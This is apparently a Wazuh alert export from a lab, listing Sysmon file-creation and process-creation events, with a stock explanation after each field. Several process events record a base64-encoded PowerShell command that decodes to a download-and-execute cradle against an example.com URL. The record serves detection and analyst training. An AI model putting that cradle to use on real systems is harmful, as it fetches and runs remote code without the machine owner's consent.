data.win.eventdata.processGuid: {94294ddc-bcac-680a-950a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10760 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_umgehqh1.lii.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:25.289 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.870045 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:27.3616052Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281843 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:27.354
ProcessGuid: {94294ddc-bcad-680a-970a-000000000e00}
ProcessId: 9580
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_sqqlcpdl.oin.ps1
CreationUtcTime: 2025-04-24 22:35:27.354
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:27.354 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcad-680a-970a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9580 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_sqqlcpdl.oin.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:27.354 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.872809 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:32.4516011Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281891 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:32.449
ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00}
ProcessId: 2732
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_okjzviqs.4g5.ps1
CreationUtcTime: 2025-04-24 22:35:32.449
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:32.449 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2732 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_okjzviqs.4g5.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:32.449 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.875573 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:32.2957666Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281890 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:31.218
ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00}
ProcessId: 2732
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb0-680a-990a-000000000e00}
ParentProcessId: 14564
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:31.218 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2732 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb0-680a-990a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14564 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.883639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:34.8231642Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282011 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:33.635
ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00}
ProcessId: 6588
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00}
ParentProcessId: 2732
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:33.635 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2732 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.891701 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:35.0179313Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282012 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:34.965
ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00}
ProcessId: 6588
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4kimfx2r.qot.ps1
CreationUtcTime: 2025-04-24 22:35:34.965
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
